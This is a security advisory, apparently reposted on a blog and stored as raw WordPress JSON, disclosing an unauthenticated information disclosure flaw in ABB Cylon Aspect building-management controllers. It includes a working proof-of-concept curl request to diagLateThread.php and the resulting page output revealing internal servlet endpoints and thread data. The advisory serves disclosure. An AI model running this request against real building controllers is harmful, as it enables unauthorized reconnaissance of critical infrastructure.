ABB Cylon Aspect 3.08.01 (diagLateThread.php) Information Disclosure<\/p>\n
Vendor: ABB Ltd.
Product web page: https:\/\/www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.01<\/p>\n
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.<\/p>\n
Desc: The ABB BMS\/BAS controller suffers from an unauthenticated information
disclosure vulnerability. An unauthorized attacker can reference the affected
page and disclose various protocol thread information running on the device.<\/p>\n
Tested on: GNU\/Linux 3.15.10 (armv7l)
GNU\/Linux 3.10.0 (x86_64)
GNU\/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP\/7.3.11
PHP\/5.6.30
PHP\/5.4.16
PHP\/4.4.8
PHP\/5.3.3
AspectFT Automation Application Server
lighttpd\/1.4.32
lighttpd\/1.4.18
Apache\/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)<\/p>\n
Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic
@zeroscience<\/p>\n
Advisory ID: ZSL-2024-5864
Advisory URL: https:\/\/www.zeroscience.mk\/en\/vulnerabilities\/ZSL-2024-5864.php<\/p>\n
21.04.2024<\/p>\n
—<\/p>\n
$ cat project<\/p>\n
P R O J E C T<\/p>\n
.|
| |
|’| ._____
___ | | |. |’ .—“|
_ .-‘ ‘-. | | .–‘| || | _| |
.-‘| _.| | || ‘-__ | | | || |
|’ | |. | || | | | | || |
____| ‘-‘ ‘ “” ‘-‘ ‘-.’ ‘` |____
\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591 \u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591
\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591
\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591
\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591
\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591
\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591
\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591
\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591 \u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591
\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591
\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591
\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2592\u2593\u2588\u2588\u2588\u2593\u2592\u2591
\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591
\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591
\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591 \u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591 <\/p>\n
$ curl -s http:\/\/192.168.73.31\/diagLateThread.php | findstr \/spina:d “Summary Thread”
7: <title>Thread Class Status<\/title>
47: #ProjectThreadStatus {
127: var url =’\/\/192.168.73.31\/jsonProxy.php?port=7226&application=StatusServlet&query=showTimerThreadPoolStatus%3Dtrue%26descending%3Dtrue%26responseFormat%3Djson’;
128: var directUrl =’\/\/192.168.73.31:7226\/servlets\/StatusServlet?showTimerThreadPoolStatus=true&descending=true&responseFormat=json’;
203: $.getJSON(url, processThreadInfo);
204: \/\/$.getJSON(directUrl, processThreadInfo);
248: \/\/infoText = “<div><h2 class=’summaryHeading’>”+targetClass+” Class Summary<\/h2><\/div><div class=’hideable’><div class=’summaryInfo’><\/div>
306: function processThreadInfo(json) {
308: getClassStats(json, PUP_STR, pupLateTime, “PUPLateTable”, “pupSummary”);
309: getClassStats(json, BACNET_STR, bacnetLateTime, “BACnetLateTable”, “bacnetSummary”);
310: getClassStats(json, SDP_STR, sdpLateTime, “SDPLateTable”, “sdpSummary”);
311: getClassStats(json, SCHEDULE_STR, scheduleLateTime, “ScheduleLateTable”, “scheduleSummary”);
312: getClassStats(json, DEFAULT_STR, defaultLateTime, “DefaultLateTable”, “defaultSummary”);
315: $(“#ProjectThreadStatus”).empty();
316: $(“#ProjectThreadStatus”).append(“<div class=’ThreadDiv’><h2>Thread Status at ” + systemTime.toTimeString() + “<\/h2><\/div>”);
317: $(“#ProjectThreadStatus”).append(“<div class=’ThreadDiv’>Total Timers: ” + json.totalTimers + “<\/div>”);
318: $(“#ProjectThreadStatus”).append(“<div class=’ThreadDiv’>Total Targets: ” + json.totalTargets + “<\/div>”);
323: var warningTime = (timebase * 1000) * threadWarnPercent;
324: var errorTime = (timebase * 1000) * threadErrorPercent;
534: <div id=”ProjectThreadStatus”><\/div>
537: <div class=’infoSection ThreadDiv’ id=”bacnetInfo”>
538: <div id=”bacnetHeading”><h2>BACnet Summary<\/h2>
541: <div id=”bacnetSummary”><\/div>
550: <div class=’infoSection ThreadDiv’ id=”pupInfo”>
551: <div id=”pupHeading”><h2>PUP Summary<\/h2>
554: <div id=”pupSummary”><\/div>
563: <div class=’infoSection ThreadDiv’ id=”sdpInfo”>
564: <div id=”sdpHeading”><h2>SDP Summary<\/h2>
567: <div id=”sdpSummary”><\/div>
576: <div class=’infoSection ThreadDiv’ id=”scheduleInfo”>
577: <div id=”scheduleHeading”><h2>Schedule Summary<\/h2>
580: <div id=”scheduleSummary”><\/div>
589: <div class=’infoSection ThreadDiv’ id=”defaultInfo”>
590: <div id=”defaultHeading”><h2>Default Summary<\/h2>
593: <div id=”defaultSummary”><\/div><\/p>\n","protected":false},"excerpt":{"rendered":"
ABB Cylon Aspect 3.08.01 (diagLateThread.php) Information Disclosure Vendor: ABB Ltd.Product web page: https:\/\/www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-StudioFirmware: <=3.08.01 Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices. Desc: The ABB BMS\/BAS controller suffers from …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-60571","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/60571","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=60571"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/60571\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=60571"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=60571"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=60571"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}